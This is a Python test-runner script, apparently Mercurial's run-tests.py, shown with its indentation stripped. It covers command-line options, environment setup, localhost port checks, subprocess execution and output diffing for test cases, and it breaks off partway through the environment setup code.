# ./run-tests.py --pure `grep -l run-tests.py *.t`
#
# (You could use any subset of the tests: test-s* happens to match
# enough that it's worth doing parallel runs, few enough that it
# completes fairly quickly, includes both shell and Python scripts, and
# includes some scripts that run daemon processes.)
from __future__ import absolute_import, print_function
import argparse
import collections
import contextlib
import difflib
import distutils.version as version
import errno
import json
import multiprocessing
import os
import platform
import random
import re
import shutil
import signal
import socket
import subprocess
import sys
import sysconfig
import tempfile
import threading
import time
import unittest
import uuid
import xml.dom.minidom as minidom
try:
import Queue as queue
except ImportError:
import queue
try:
import shlex
shellquote = shlex.quote
except (ImportError, AttributeError):
import pipes
shellquote = pipes.quote
processlock = threading.Lock()
pygmentspresent = False
# ANSI color is unsupported prior to Windows 10
if os.name != "nt":
try: # is pygments installed
import pygments
import pygments.lexers as lexers
import pygments.lexer as lexer
import pygments.formatters as formatters
import pygments.token as token
import pygments.style as style
pygmentspresent = True
difflexer = lexers.DiffLexer()
terminal256formatter = formatters.Terminal256Formatter()
except ImportError:
pass
if pygmentspresent:
class TestRunnerStyle(style.Style):
default_style = ""
skipped = token.string_to_tokentype("Token.Generic.Skipped")
failed = token.string_to_tokentype("Token.Generic.Failed")
skippedname = token.string_to_tokentype("Token.Generic.SName")
failedname = token.string_to_tokentype("Token.Generic.FName")
styles = {
skipped: "#e5e5e5",
skippedname: "#00ffff",
failed: "#7f0000",
failedname: "#ff0000",
}
class TestRunnerLexer(lexer.RegexLexer):
testpattern = r"[\w-]+\.(t|py)(#[a-zA-Z0-9_\-\.]+)?"
tokens = {
"root": [
(r"^Skipped", token.Generic.Skipped, "skipped"),
(r"^Failed ", token.Generic.Failed, "failed"),
(r"^ERROR: ", token.Generic.Failed, "failed"),
],
"skipped": [
(testpattern, token.Generic.SName),
(r":.*", token.Generic.Skipped),
],
"failed": [
(testpattern, token.Generic.FName),
(r"(:| ).*", token.Generic.Failed),
],
}
runnerformatter = formatters.Terminal256Formatter(style=TestRunnerStyle)
runnerlexer = TestRunnerLexer()
origenviron = os.environ.copy()
if sys.version_info > (3, 5, 0):
PYTHON3 = True
xrange = range # we use xrange in one place, and we'd rather not use range
def _sys2bytes(p):
if p is None:
return p
return p.encode("utf-8")
def _bytes2sys(p):
if p is None:
return p
return p.decode("utf-8")
osenvironb = getattr(os, "environb", None)
if osenvironb is None:
# Windows lacks os.environb, for instance. A proxy over the real thing
# instead of a copy allows the environment to be updated via bytes on
# all platforms.
class environbytes(object):
def __init__(self, strenv):
self.__len__ = strenv.__len__
self.clear = strenv.clear
self._strenv = strenv
def __getitem__(self, k):
v = self._strenv.__getitem__(_bytes2sys(k))
return _sys2bytes(v)
def __setitem__(self, k, v):
self._strenv.__setitem__(_bytes2sys(k), _bytes2sys(v))
def __delitem__(self, k):
self._strenv.__delitem__(_bytes2sys(k))
def __contains__(self, k):
return self._strenv.__contains__(_bytes2sys(k))
def __iter__(self):
return iter([_sys2bytes(k) for k in iter(self._strenv)])
def get(self, k, default=None):
v = self._strenv.get(_bytes2sys(k), _bytes2sys(default))
return _sys2bytes(v)
def pop(self, k, default=None):
v = self._strenv.pop(_bytes2sys(k), _bytes2sys(default))
return _sys2bytes(v)
osenvironb = environbytes(os.environ)
getcwdb = getattr(os, "getcwdb")
if not getcwdb or os.name == "nt":
getcwdb = lambda: _sys2bytes(os.getcwd())
elif sys.version_info >= (3, 0, 0):
print(
"%s is only supported on Python 3.5+ and 2.7, not %s"
% (sys.argv[0], ".".join(str(v) for v in sys.version_info[:3]))
)
sys.exit(70) # EX_SOFTWARE from `man 3 sysexit`
else:
PYTHON3 = False
# In python 2.x, path operations are generally done using
# bytestrings by default, so we don't have to do any extra
# fiddling there. We define the wrapper functions anyway just to
# help keep code consistent between platforms.
def _sys2bytes(p):
return p
_bytes2sys = _sys2bytes
osenvironb = os.environ
getcwdb = os.getcwd
# For Windows support
wifexited = getattr(os, "WIFEXITED", lambda x: False)
# Whether to use IPv6
def checksocketfamily(name, port=20058):
"""return true if we can listen on localhost using family=name
name should be either 'AF_INET', or 'AF_INET6'.
port being used is okay - EADDRINUSE is considered as successful.
"""
family = getattr(socket, name, None)
if family is None:
return False
try:
s = socket.socket(family, socket.SOCK_STREAM)
s.bind(("localhost", port))
s.close()
return True
except socket.error as exc:
if exc.errno == errno.EADDRINUSE:
return True
elif exc.errno in (errno.EADDRNOTAVAIL, errno.EPROTONOSUPPORT):
return False
else:
raise
else:
return False
# useipv6 will be set by parseargs
useipv6 = None
def checkportisavailable(port):
"""return true if a port seems free to bind on localhost"""
if useipv6:
family = socket.AF_INET6
else:
family = socket.AF_INET
try:
with contextlib.closing(socket.socket(family, socket.SOCK_STREAM)) as s:
s.bind(("localhost", port))
return True
except socket.error as exc:
if os.name == "nt" and exc.errno == errno.WSAEACCES:
return False
elif exc.errno not in (
errno.EADDRINUSE,
errno.EADDRNOTAVAIL,
errno.EPROTONOSUPPORT,
):
raise
return False
closefds = os.name == "posix"
def Popen4(cmd, wd, timeout, env=None):
processlock.acquire()
p = subprocess.Popen(
_bytes2sys(cmd),
shell=True,
bufsize=-1,
cwd=_bytes2sys(wd),
env=env,
close_fds=closefds,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
processlock.release()
p.fromchild = p.stdout
p.tochild = p.stdin
p.childerr = p.stderr
p.timeout = False
if timeout:
def t():
start = time.time()
while time.time() - start < timeout and p.returncode is None:
time.sleep(0.1)
p.timeout = True
vlog("# Timout reached for process %d" % p.pid)
if p.returncode is None:
terminate(p)
threading.Thread(target=t).start()
return p
if sys.executable:
sysexecutable = sys.executable
elif os.environ.get("PYTHONEXECUTABLE"):
sysexecutable = os.environ["PYTHONEXECUTABLE"]
elif os.environ.get("PYTHON"):
sysexecutable = os.environ["PYTHON"]
else:
raise AssertionError("Could not find Python interpreter")
PYTHON = _sys2bytes(sysexecutable.replace("\\", "/"))
IMPL_PATH = b"PYTHONPATH"
if "java" in sys.platform:
IMPL_PATH = b"JYTHONPATH"
default_defaults = {
"jobs": ("HGTEST_JOBS", multiprocessing.cpu_count()),
"timeout": ("HGTEST_TIMEOUT", 180),
"slowtimeout": ("HGTEST_SLOWTIMEOUT", 1500),
"port": ("HGTEST_PORT", 20059),
"shell": ("HGTEST_SHELL", "sh"),
}
defaults = default_defaults.copy()
def canonpath(path):
return os.path.realpath(os.path.expanduser(path))
def parselistfiles(files, listtype, warn=True):
entries = dict()
for filename in files:
try:
path = os.path.expanduser(os.path.expandvars(filename))
f = open(path, "rb")
except IOError as err:
if err.errno != errno.ENOENT:
raise
if warn:
print("warning: no such %s file: %s" % (listtype, filename))
continue
for line in f.readlines():
line = line.split(b"#", 1)[0].strip()
if line:
entries[line] = filename
f.close()
return entries
def parsettestcases(path):
"""read a .t test file, return a set of test case names
If path does not exist, return an empty set.
"""
cases = []
try:
with open(path, "rb") as f:
for l in f:
if l.startswith(b"#testcases "):
cases.append(sorted(l[11:].split()))
except IOError as ex:
if ex.errno != errno.ENOENT:
raise
return cases
def getparser():
"""Obtain the OptionParser used by the CLI."""
parser = argparse.ArgumentParser(usage="%(prog)s [options] [tests]")
selection = parser.add_argument_group("Test Selection")
selection.add_argument(
"--allow-slow-tests",
action="store_true",
help="allow extremely slow tests",
)
selection.add_argument(
"--blacklist",
action="append",
help="skip tests listed in the specified blacklist file",
)
selection.add_argument(
"--changed",
help="run tests that are changed in parent rev or working directory",
)
selection.add_argument("-k", "--keywords", help="run tests matching keywords")
selection.add_argument(
"-r", "--retest", action="store_true", help="retest failed tests"
)
selection.add_argument(
"--test-list",
action="append",
help="read tests to run from the specified file",
)
selection.add_argument(
"--whitelist",
action="append",
help="always run tests listed in the specified whitelist file",
)
selection.add_argument("tests", metavar="TESTS", nargs="*", help="Tests to run")
harness = parser.add_argument_group("Test Harness Behavior")
harness.add_argument(
"--bisect-repo",
metavar="bisect_repo",
help=("Path of a repo to bisect. Use together with " "--known-good-rev"),
)
harness.add_argument(
"-d",
"--debug",
action="store_true",
help="debug mode: write output of test scripts to console"
" rather than capturing and diffing it (disables timeout)",
)
harness.add_argument(
"-f",
"--first",
action="store_true",
help="exit on the first test failure",
)
harness.add_argument(
"-i",
"--interactive",
action="store_true",
help="prompt to accept changed output",
)
harness.add_argument(
"-j",
"--jobs",
type=int,
help="number of jobs to run in parallel"
" (default: $%s or %d)" % defaults["jobs"],
)
harness.add_argument(
"--keep-tmpdir",
action="store_true",
help="keep temporary directory after running tests",
)
harness.add_argument(
"--known-good-rev",
metavar="known_good_rev",
help=(
"Automatically bisect any failures using this "
"revision as a known-good revision."
),
)
harness.add_argument(
"--list-tests",
action="store_true",
help="list tests instead of running them",
)
harness.add_argument("--loop", action="store_true", help="loop tests repeatedly")
harness.add_argument(
"--random", action="store_true", help="run tests in random order"
)
harness.add_argument(
"--order-by-runtime",
action="store_true",
help="run slowest tests first, according to .testtimes",
)
harness.add_argument(
"-p",
"--port",
type=int,
help="port on which servers should listen"
" (default: $%s or %d)" % defaults["port"],
)
harness.add_argument(
"--profile-runner",
action="store_true",
help="run statprof on run-tests",
)
harness.add_argument(
"-R", "--restart", action="store_true", help="restart at last error"
)
harness.add_argument(
"--runs-per-test",
type=int,
dest="runs_per_test",
help="run each test N times (default=1)",
default=1,
)
harness.add_argument(
"--shell", help="shell to use (default: $%s or %s)" % defaults["shell"]
)
harness.add_argument(
"--showchannels", action="store_true", help="show scheduling channels"
)
harness.add_argument(
"--slowtimeout",
type=int,
help="kill errant slow tests after SLOWTIMEOUT seconds"
" (default: $%s or %d)" % defaults["slowtimeout"],
)
harness.add_argument(
"-t",
"--timeout",
type=int,
help="kill errant tests after TIMEOUT seconds"
" (default: $%s or %d)" % defaults["timeout"],
)
harness.add_argument(
"--tmpdir",
help="run tests in the given temporary directory" " (implies --keep-tmpdir)",
)
harness.add_argument(
"-v", "--verbose", action="store_true", help="output verbose messages"
)
hgconf = parser.add_argument_group("Mercurial Configuration")
hgconf.add_argument(
"--chg",
action="store_true",
help="install and use chg wrapper in place of hg",
)
hgconf.add_argument(
"--chg-debug",
action="store_true",
help="show chg debug logs",
)
hgconf.add_argument(
"--rhg",
action="store_true",
help="install and use rhg Rust implementation in place of hg",
)
hgconf.add_argument("--compiler", help="compiler to build with")
hgconf.add_argument(
"--extra-config-opt",
action="append",
default=[],
help="set the given config opt in the test hgrc",
)
hgconf.add_argument(
"-l",
"--local",
action="store_true",
help="shortcut for --with-hg=<testdir>/../hg, "
"--with-rhg=<testdir>/../rust/target/release/rhg if --rhg is set, "
"and --with-chg=<testdir>/../contrib/chg/chg if --chg is set",
)
hgconf.add_argument(
"--ipv6",
action="store_true",
help="prefer IPv6 to IPv4 for network related tests",
)
hgconf.add_argument(
"--pure",
action="store_true",
help="use pure Python code instead of C extensions",
)
hgconf.add_argument(
"--rust",
action="store_true",
help="use Rust code alongside C extensions",
)
hgconf.add_argument(
"--no-rust",
action="store_true",
help="do not use Rust code even if compiled",
)
hgconf.add_argument(
"--with-chg",
metavar="CHG",
help="use specified chg wrapper in place of hg",
)
hgconf.add_argument(
"--with-rhg",
metavar="RHG",
help="use specified rhg Rust implementation in place of hg",
)
hgconf.add_argument(
"--with-hg",
metavar="HG",
help="test using specified hg script rather than a " "temporary installation",
)
reporting = parser.add_argument_group("Results Reporting")
reporting.add_argument(
"-C",
"--annotate",
action="store_true",
help="output files annotated with coverage",
)
reporting.add_argument(
"--color",
choices=["always", "auto", "never"],
default=os.environ.get("HGRUNTESTSCOLOR", "auto"),
help="colorisation: always|auto|never (default: auto)",
)
reporting.add_argument(
"-c",
"--cover",
action="store_true",
help="print a test coverage report",
)
reporting.add_argument(
"--exceptions",
action="store_true",
help="log all exceptions and generate an exception report",
)
reporting.add_argument(
"-H",
"--htmlcov",
action="store_true",
help="create an HTML report of the coverage of the files",
)
reporting.add_argument(
"--json",
action="store_true",
help="store test result data in 'report.json' file",
)
reporting.add_argument(
"--outputdir",
help="directory to write error logs to (default=test directory)",
)
reporting.add_argument(
"-n", "--nodiff", action="store_true", help="skip showing test changes"
)
reporting.add_argument(
"-S",
"--noskips",
action="store_true",
help="don't report skip tests verbosely",
)
reporting.add_argument(
"--time", action="store_true", help="time how long each test takes"
)
reporting.add_argument("--view", help="external diff viewer")
reporting.add_argument("--xunit", help="record xunit results at specified path")
for option, (envvar, default) in defaults.items():
defaults[option] = type(default)(os.environ.get(envvar, default))
parser.set_defaults(**defaults)
return parser
def parseargs(args, parser):
"""Parse arguments with our OptionParser and validate results."""
options = parser.parse_args(args)
# jython is always pure
if "java" in sys.platform or "__pypy__" in sys.modules:
options.pure = True
if platform.python_implementation() != "CPython" and options.rust:
parser.error("Rust extensions are only available with CPython")
if options.pure and options.rust:
parser.error("--rust cannot be used with --pure")
if options.rust and options.no_rust:
parser.error("--rust cannot be used with --no-rust")
if options.local:
if options.with_hg or options.with_rhg or options.with_chg:
parser.error(
"--local cannot be used with --with-hg or --with-rhg or --with-chg"
)
testdir = os.path.dirname(_sys2bytes(canonpath(sys.argv[0])))
reporootdir = os.path.dirname(testdir)
pathandattrs = [(b"hg", "with_hg")]
if options.chg:
pathandattrs.append((b"contrib/chg/chg", "with_chg"))
if options.rhg:
pathandattrs.append((b"rust/target/release/rhg", "with_rhg"))
for relpath, attr in pathandattrs:
binpath = os.path.join(reporootdir, relpath)
if os.name != "nt" and not os.access(binpath, os.X_OK):
parser.error(
"--local specified, but %r not found or " "not executable" % binpath
)
setattr(options, attr, _bytes2sys(binpath))
if options.with_hg:
options.with_hg = canonpath(_sys2bytes(options.with_hg))
if not (
os.path.isfile(options.with_hg) and os.access(options.with_hg, os.X_OK)
):
parser.error("--with-hg must specify an executable hg script")
if os.path.basename(options.with_hg) not in [b"hg", b"hg.exe"]:
sys.stderr.write("warning: --with-hg should specify an hg script\n")
sys.stderr.flush()
if (options.chg or options.with_chg) and os.name == "nt":
parser.error("chg does not work on %s" % os.name)
if (options.rhg or options.with_rhg) and os.name == "nt":
parser.error("rhg does not work on %s" % os.name)
if options.with_chg:
options.chg = False # no installation to temporary location
options.with_chg = canonpath(_sys2bytes(options.with_chg))
if not (
os.path.isfile(options.with_chg) and os.access(options.with_chg, os.X_OK)
):
parser.error("--with-chg must specify a chg executable")
if options.with_rhg:
options.rhg = False # no installation to temporary location
options.with_rhg = canonpath(_sys2bytes(options.with_rhg))
if not (
os.path.isfile(options.with_rhg) and os.access(options.with_rhg, os.X_OK)
):
parser.error("--with-rhg must specify a rhg executable")
if options.chg and options.with_hg:
# chg shares installation location with hg
parser.error(
"--chg does not work when --with-hg is specified "
"(use --with-chg instead)"
)
if options.rhg and options.with_hg:
# rhg shares installation location with hg
parser.error(
"--rhg does not work when --with-hg is specified "
"(use --with-rhg instead)"
)
if options.rhg and options.chg:
parser.error("--rhg and --chg do not work together")
if options.color == "always" and not pygmentspresent:
sys.stderr.write(
"warning: --color=always ignored because " "pygments is not installed\n"
)
if options.bisect_repo and not options.known_good_rev:
parser.error("--bisect-repo cannot be used without --known-good-rev")
global useipv6
if options.ipv6:
useipv6 = checksocketfamily("AF_INET6")
else:
# only use IPv6 if IPv4 is unavailable and IPv6 is available
useipv6 = (not checksocketfamily("AF_INET")) and checksocketfamily("AF_INET6")
options.anycoverage = options.cover or options.annotate or options.htmlcov
if options.anycoverage:
try:
import coverage
covver = version.StrictVersion(coverage.__version__).version
if covver < (3, 3):
parser.error("coverage options require coverage 3.3 or later")
except ImportError:
parser.error("coverage options now require the coverage package")
if options.anycoverage and options.local:
# this needs some path mangling somewhere, I guess
parser.error("sorry, coverage options do not work when --local " "is specified")
if options.anycoverage and options.with_hg:
parser.error(
"sorry, coverage options do not work when --with-hg " "is specified"
)
global verbose
if options.verbose:
verbose = ""
if options.tmpdir:
options.tmpdir = canonpath(options.tmpdir)
if options.jobs < 1:
parser.error("--jobs must be positive")
if options.interactive and options.debug:
parser.error("-i/--interactive and -d/--debug are incompatible")
if options.debug:
if options.timeout != defaults["timeout"]:
sys.stderr.write("warning: --timeout option ignored with --debug\n")
if options.slowtimeout != defaults["slowtimeout"]:
sys.stderr.write("warning: --slowtimeout option ignored with --debug\n")
options.timeout = 0
options.slowtimeout = 0
if options.blacklist:
options.blacklist = parselistfiles(options.blacklist, "blacklist")
if options.whitelist:
options.whitelisted = parselistfiles(options.whitelist, "whitelist")
else:
options.whitelisted = {}
if options.showchannels:
options.nodiff = True
return options
def rename(src, dst):
"""Like os.rename(), trade atomicity and opened files friendliness
for existing destination support.
"""
shutil.copy(src, dst)
os.remove(src)
def makecleanable(path):
"""Try to fix directory permission recursively so that the entire tree
can be deleted"""
for dirpath, dirnames, _filenames in os.walk(path, topdown=True):
for d in dirnames:
p = os.path.join(dirpath, d)
try:
os.chmod(p, os.stat(p).st_mode & 0o777 | 0o700) # chmod u+rwx
except OSError:
pass
_unified_diff = difflib.unified_diff
if PYTHON3:
import functools
_unified_diff = functools.partial(difflib.diff_bytes, difflib.unified_diff)
def getdiff(expected, output, ref, err):
servefail = False
lines = []
for line in _unified_diff(expected, output, ref, err):
if line.startswith(b"+++") or line.startswith(b"---"):
line = line.replace(b"\\", b"/")
if line.endswith(b" \n"):
line = line[:-2] + b"\n"
lines.append(line)
if not servefail and line.startswith(
b"+ abort: child process failed to start"
):
servefail = True
return servefail, lines
verbose = False
def vlog(*msg):
"""Log only when in verbose mode."""
if verbose is False:
return
return log(*msg)
# Bytes that break XML even in a CDATA block: control characters 0-31
# sans \t, \n and \r
CDATA_EVIL = re.compile(br"[\000-\010\013\014\016-\037]")
# Match feature conditionalized output lines in the form, capturing the feature
# list in group 2, and the preceeding line output in group 1:
#
# output..output (feature !)\n
optline = re.compile(br"(.*) \((.+?) !\)\n$")
def cdatasafe(data):
"""Make a string safe to include in a CDATA block.
Certain control characters are illegal in a CDATA block, and
there's no way to include a ]]> in a CDATA either. This function
replaces illegal bytes with ? and adds a space between the ]] so
that it won't break the CDATA block.
"""
return CDATA_EVIL.sub(b"?", data).replace(b"]]>", b"] ]>")
def log(*msg):
"""Log something to stdout.
Arguments are strings to print.
"""
with iolock:
if verbose:
print(verbose, end=" ")
for m in msg:
print(m, end=" ")
print()
sys.stdout.flush()
def highlightdiff(line, color):
if not color:
return line
assert pygmentspresent
return pygments.highlight(
line.decode("latin1"), difflexer, terminal256formatter
).encode("latin1")
def highlightmsg(msg, color):
if not color:
return msg
assert pygmentspresent
return pygments.highlight(msg, runnerlexer, runnerformatter)
def terminate(proc):
"""Terminate subprocess"""
vlog("# Terminating process %d" % proc.pid)
try:
proc.terminate()
except OSError:
pass
def killdaemons(pidfile):
import killdaemons as killmod
return killmod.killdaemons(pidfile, tryhard=False, remove=True, logfn=vlog)
class Test(unittest.TestCase):
"""Encapsulates a single, runnable test.
While this class conforms to the unittest.TestCase API, it differs in that
instances need to be instantiated manually. (Typically, unittest.TestCase
classes are instantiated automatically by scanning modules.)
"""
# Status code reserved for skipped tests (used by hghave).
SKIPPED_STATUS = 80
def __init__(
self,
path,
outputdir,
tmpdir,
keeptmpdir=False,
debug=False,
first=False,
timeout=None,
startport=None,
extraconfigopts=None,
shell=None,
hgcommand=None,
slowtimeout=None,
usechg=False,
chgdebug=False,
useipv6=False,
):
"""Create a test from parameters.
path is the full path to the file defining the test.
tmpdir is the main temporary directory to use for this test.
keeptmpdir determines whether to keep the test's temporary directory
after execution. It defaults to removal (False).
debug mode will make the test execute verbosely, with unfiltered
output.
timeout controls the maximum run time of the test. It is ignored when
debug is True. See slowtimeout for tests with #require slow.
slowtimeout overrides timeout if the test has #require slow.
startport controls the starting port number to use for this test. Each
test will reserve 3 port numbers for execution. It is the caller's
responsibility to allocate a non-overlapping port range to Test
instances.
extraconfigopts is an iterable of extra hgrc config options. Values
must have the form "key=value" (something understood by hgrc). Values
of the form "foo.key=value" will result in "[foo] key=value".
shell is the shell to execute tests in.
"""
if timeout is None:
timeout = defaults["timeout"]
if startport is None:
startport = defaults["port"]
if slowtimeout is None:
slowtimeout = defaults["slowtimeout"]
self.path = path
self.relpath = os.path.relpath(path)
self.bname = os.path.basename(path)
self.name = _bytes2sys(self.bname)
self._testdir = os.path.dirname(path)
self._outputdir = outputdir
self._tmpname = os.path.basename(path)
self.errpath = os.path.join(self._outputdir, b"%s.err" % self.bname)
self._threadtmp = tmpdir
self._keeptmpdir = keeptmpdir
self._debug = debug
self._first = first
self._timeout = timeout
self._slowtimeout = slowtimeout
self._startport = startport
self._extraconfigopts = extraconfigopts or []
self._shell = _sys2bytes(shell)
self._hgcommand = hgcommand or b"hg"
self._usechg = usechg
self._chgdebug = chgdebug
self._useipv6 = useipv6
self._aborted = False
self._daemonpids = []
self._finished = None
self._ret = None
self._out = None
self._skipped = None
self._testtmp = None
self._chgsockdir = None
self._refout = self.readrefout()
def readrefout(self):
"""read reference output"""
# If we're not in --debug mode and reference output file exists,
# check test output against it.
if self._debug:
return None # to match "out is None"
elif os.path.exists(self.refpath):
with open(self.refpath, "rb") as f:
return f.read().splitlines(True)
else:
return []
# needed to get base class __repr__ running
@property
def _testMethodName(self):
return self.name
def __str__(self):
return self.name
def shortDescription(self):
return self.name
def setUp(self):
"""Tasks to perform before run()."""
self._finished = False
self._ret = None
self._out = None
self._skipped = None
try:
os.mkdir(self._threadtmp)
except OSError as e:
if e.errno != errno.EEXIST:
raise
name = self._tmpname
self._testtmp = os.path.join(self._threadtmp, name)
os.mkdir(self._testtmp)
# Remove any previous output files.
if os.path.exists(self.errpath):
try:
os.remove(self.errpath)
except OSError as e:
# We might have raced another test to clean up a .err
# file, so ignore ENOENT when removing a previous .err
# file.
if e.errno != errno.ENOENT:
raise
if self._usechg:
self._chgsockdir = os.path.join(self._threadtmp, b"%s.chgsock" % name)
os.mkdir(self._chgsockdir)
def run(self, result):
"""Run this test and report results against a TestResult instance."""
# This function is extremely similar to unittest.TestCase.run(). Once
# we require Python 2.7 (or at least its version of unittest), this
# function can largely go away.
self._result = result
result.startTest(self)
try:
try:
self.setUp()
except (KeyboardInterrupt, SystemExit):
self._aborted = True
raise
except Exception:
result.addError(self, sys.exc_info())
return
success = False
try:
self.runTest()
except KeyboardInterrupt:
self._aborted = True
raise
except unittest.SkipTest as e:
result.addSkip(self, str(e))
# The base class will have already counted this as a
# test we "ran", but we want to exclude skipped tests
# from those we count towards those run.
result.testsRun -= 1
except self.failureException as e:
# This differs from unittest in that we don't capture
# the stack trace. This is for historical reasons and
# this decision could be revisited in the future,
# especially for PythonTest instances.
if result.addFailure(self, str(e)):
success = True
except Exception:
result.addError(self, sys.exc_info())
else:
success = True
try:
self.tearDown()
except (KeyboardInterrupt, SystemExit):
self._aborted = True
raise
except Exception:
result.addError(self, sys.exc_info())
success = False
if success:
result.addSuccess(self)
finally:
result.stopTest(self, interrupted=self._aborted)
def runTest(self):
"""Run this test instance.
This will return a tuple describing the result of the test.
"""
env = self._getenv()
self._genrestoreenv(env)
self._daemonpids.append(env["DAEMON_PIDS"])
self._createhgrc(env["HGRCPATH"])
vlog("# Test", self.name)
ret, out = self._run(env)
self._finished = True
self._ret = ret
self._out = out
def describe(ret):
if ret < 0:
return "killed by signal: %d" % -ret
return "returned error code %d" % ret
self._skipped = False
if ret == self.SKIPPED_STATUS:
if out is None: # Debug mode, nothing to parse.
missing = ["unknown"]
failed = None
else:
missing, failed = TTest.parsehghaveoutput(out)
if not missing:
missing = ["skipped"]
if failed:
self.fail("hg have failed checking for %s" % failed[-1])
else:
self._skipped = True
raise unittest.SkipTest(missing[-1])
elif ret == "timeout":
self.fail("timed out")
elif ret is False:
self.fail("no result code from test")
elif out != self._refout:
# Diff generation may rely on written .err file.
if (
(ret != 0 or out != self._refout)
and not self._skipped
and not self._debug
):
with open(self.errpath, "wb") as f:
for line in out:
f.write(line)
# The result object handles diff calculation for us.
with firstlock:
if self._result.addOutputMismatch(self, ret, out, self._refout):
# change was accepted, skip failing
return
if self._first:
global firsterror
firsterror = True
if ret:
msg = "output changed and " + describe(ret)
else:
msg = "output changed"
self.fail(msg)
elif ret:
self.fail(describe(ret))
def tearDown(self):
"""Tasks to perform after run()."""
for entry in self._daemonpids:
killdaemons(entry)
self._daemonpids = []
if self._keeptmpdir:
log(
"\nKeeping testtmp dir: %s\nKeeping threadtmp dir: %s"
% (
_bytes2sys(self._testtmp),
_bytes2sys(self._threadtmp),
)
)
else:
try:
shutil.rmtree(self._testtmp)
except OSError:
# unreadable directory may be left in $TESTTMP; fix permission
# and try again
makecleanable(self._testtmp)
shutil.rmtree(self._testtmp, True)
shutil.rmtree(self._threadtmp, True)
if self._usechg:
# chgservers will stop automatically after they find the socket
# files are deleted
shutil.rmtree(self._chgsockdir, True)
if (
(self._ret != 0 or self._out != self._refout)
and not self._skipped
and not self._debug
and self._out
):
with open(self.errpath, "wb") as f:
for line in self._out:
f.write(line)
vlog("# Ret was:", self._ret, "(%s)" % self.name)
def _run(self, env):
# This should be implemented in child classes to run tests.
raise unittest.SkipTest("unknown test type")
def abort(self):
"""Terminate execution of this test."""
self._aborted = True
def _portmap(self, i):
offset = b"" if i == 0 else b"%d" % i
return (br":%d\b" % (self._startport + i), b":$HGPORT%s" % offset)
def _getreplacements(self):
"""Obtain a mapping of text replacements to apply to test output.
Test output needs to be normalized so it can be compared to expected
output. This function defines how some of that normalization will
occur.
"""
r = [
# This list should be parallel to defineport in _getenv
self._portmap(0),
self._portmap(1),
self._portmap(2),
(br"([^0-9])%s" % re.escape(self._localip()), br"\1$LOCALIP"),
(br"\bHG_TXNID=TXN:[a-f0-9]{40}\b", br"HG_TXNID=TXN:$ID$"),
]
r.append((self._escapepath(self._testtmp), b"$TESTTMP"))
replacementfile = os.path.join(self._testdir, b"common-pattern.py")
if os.path.exists(replacementfile):
data = {}
with open(replacementfile, mode="rb") as source:
# the intermediate 'compile' step help with debugging
code = compile(source.read(), replacementfile, "exec")
exec(code, data)
for value in data.get("substitutions", ()):
if len(value) != 2:
msg = "malformatted substitution in %s: %r"
msg %= (replacementfile, value)
raise ValueError(msg)
r.append(value)
return r
def _escapepath(self, p):
if os.name == "nt":
return b"".join(
c.isalpha()
and b"[%s%s]" % (c.lower(), c.upper())
or c in b"/\\"
and br"[/\\]"
or c.isdigit()
and c
or b"\\" + c
for c in [p[i : i + 1] for i in range(len(p))]
)
else:
return re.escape(p)
def _localip(self):
if self._useipv6:
return b"::1"
else:
return b"127.0.0.1"
def _genrestoreenv(self, testenv):
"""Generate a script that can be used by tests to restore the original
environment."""
# Put the restoreenv script inside self._threadtmp
scriptpath = os.path.join(self._threadtmp, b"restoreenv.sh")
testenv["HGTEST_RESTOREENV"] = _bytes2sys(scriptpath)
# Only restore environment variable names that the shell allows
# us to export.
name_regex = re.compile("^[a-zA-Z][a-zA-Z0-9_]*$")
# Do not restore these variables; otherwise tests would fail.
reqnames = {"PYTHON", "TESTDIR", "TESTTMP"}
with open(scriptpath, "w") as envf:
for name, value in origenviron.items():
if not name_regex.match(name):
# Skip environment variables with unusual names not
# allowed by most shells.
continue
if name in reqnames:
continue
envf.write("%s=%s\n" % (name, shellquote(value)))
for name in testenv:
if name in origenviron or name in reqnames:
continue
envf.write("unset %s\n" % (name,))
def _getenv(self):
"""Obtain environment variables to use during test execution."""
def defineport(i):
offset = "" if i == 0 else "%s" % i
env["HGPORT%s" % offset] = "%s" % (self._startport + i)
env = os.environ.copy()
env["PYTHONUSERBASE"] = sysconfig.get_config_var("userbase") or ""
env["HGEMITWARNINGS"] = "1"
env["TESTTMP"] = _bytes2sys(self._testtmp)
env["TESTNAME"] = self.name
env["HOME"] = _bytes2sys(self._testtmp)
if os.name == "nt":
env["REALUSERPROFILE"] = env["USERPROFILE"]
# py3.8+ ignores HOME: https://bugs.python.org/issue36264
env["USERPROFILE"] = env["HOME"]
formated_timeout = _bytes2sys(b"%d" % default_defaults["timeout"][1])
env["HGTEST_TIMEOUT_DEFAULT"] = formated_timeout
env["HGTEST_TIMEOUT"] = _bytes2sys(b"%d" % self._timeout)
# This number should match portneeded in _getport
for port in xrange(3):
# This list should be parallel to _portmap in _getreplacements
defineport(port)
env["HGRCPATH"] = _bytes2sys(os.path.join(self._threadtmp, b".hgrc"))
env["DAEMON_PIDS"] = _bytes2sys(os.path.join(self._threadtmp, b"daemon.pids"))
env["HGEDITOR"] = '"' + sysexecutable + '"' + ' -c "import sys; sys.exit(0)"'
env["HGUSER"] = "test"
env["HGENCODING"] = "ascii"
env["HGENCODINGMODE"] = "strict"
env["HGHOSTNAME"] = "test-hostname"
env["HGIPV6"] = str(int(self._useipv6))
# See contrib/catapipe.py for how to use this functionality.
if "HGTESTCATAPULTSERVERPIPE" not in env:
# If we don't have HGTESTCATAPULTSERVERPIPE explicitly set, pull the
# non-test one in as a default, otherwise set to devnull
env["HGTESTCATAPULTSERVERPIPE"] = env.get(
"HGCATAPULTSERVERPIPE", os.devnull
)
extraextensions = []
for opt in self._extraconfigopts:
section, key = opt.split(".", 1)
if section != "extensions":
continue
name = key.split("=", 1)[0]
extraextensions.append(name)
if extraextensions:
env["HGTESTEXTRAEXTENSIONS"] = " ".join(extraextensions)
# LOCALIP could be ::1 or 127.0.0.1. Useful for tests that require raw
# IP addresses.
env["LOCALIP"] = _bytes2sys(self._localip())
# This has the same effect as Py_LegacyWindowsStdioFlag in exewrapper.c,
# but this is needed for testing python instances like dummyssh,
# dummysmtpd.py, and dumbhttp.py.
if PYTHON3 and os.name == "nt":
env["PYTHONLEGACYWINDOWSSTDIO"] = "1"
# Modified HOME in test environment can confuse Rust tools. So set
# CARGO_HOME and RUSTUP_HOME automatically if a Rust toolchain is
# present and these variables aren't already defined.
cargo_home_path = os.path.expanduser("~/.cargo")
rustup_home_path = os.path.expanduser("~/.rustup")
